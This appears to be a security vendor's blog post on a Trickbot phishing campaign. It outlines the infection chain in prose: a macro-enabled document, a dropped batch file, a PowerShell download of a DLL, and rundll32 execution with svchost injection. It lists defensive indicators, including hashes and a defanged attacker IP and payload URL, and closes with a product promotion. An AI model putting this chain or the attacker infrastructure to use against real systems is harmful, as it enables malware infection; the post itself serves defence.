Trickbot malware has been with us since 2016. It started as a banking trojan, targeting financial services and users to steal banking data. However, over the years, it has evolved into sophisticated, multi-modular malware that is able to infect PCs running both Windows and Linux OS.

Trickbot malware is believed to be affiliated with Conti ransomware attacks as the ransomware was installed after networks were compromised by Trickbot. Other Trickbot gang’s malware, such as BazarLoader, used to deploy a Ryuk ransomware that targeted Volue , K12, The University of Vermont Health Network, and many others. Trickbot malwares usually spread through phishing campaigns, with embedded URLs or infected attachments.

Trickbot roots are being traced to Russian-based threat actors. One of the believed gang members was arrested recently in South Korea. In addition, a Latvian national was charged by the U.S Department of Justice for helping the Trickbot gang develop a platform for a new ransomware operation. Despite the arrests, the gang continued to operate as normal.

Yesterday, the Malwarebytes Threat Intelligence team tweeted that they had spotted a new phishing campaign that infects victims with Trickbot Malware. It employs a recognizable chain of attack:

  1. Victim opens a malicious .docm file that is “protected” and macro should be enabled to “unlock it”:

malicious .docm file

Figure 1 Malicous .docm Attachment

  1. Once the victim enables macro execution, a randomly named .bat file is dropped into C:\ProgramData directory:

.bat file

Figure 2 .bat File Drop

  1. Trickbot payload dropped from attacker’s server, using PowerShell to C:\ProgramData as .dll file.
  2. WinWord executes malicious DLL using rundll32.exe, known as T1218.011 MITRE technique.
  3. Malicious DLL being injected into svchost.exe, known as T1055.012 MITRE technique.

Trickbot

Figure 3 Execution Flow

 

The Trickbot gang is continuously evolving its arsenal by developing new tools and upgrading their existing ones. Our Macro Protection technology prevents the drop and the execution of malware belonging to the Trickbot Family at its earliest stage, including the execution of the aforementioned campaign:

 

Macro Protection technology

Learn more about Minerva Armor and how it can stop ransomware before it starts.

Figure 4 Trickbot Execution Prevention

IOC’s:

Hash:

405b918189ab1ba4f756be1e698a7375e2add4ba04c8edc75a83bc58ff526eab

6230ef179a43e13f5c18d8a60dfa2d200a55d2d90db9a264d52753c49f9200ed

IP’s:

23.227.196[.]84

URL:

http://23.227.196[.]84/images/onlinetools.png

 

Resources:

https://www.bleepingcomputer.com/news/security/jvckenwood-hit-by-conti-ransomware-claiming-theft-of-15tb-data/

https://www.bleepingcomputer.com/news/security/bazarloader-used-to-deploy-ryuk-ransomware-on-high-value-targets/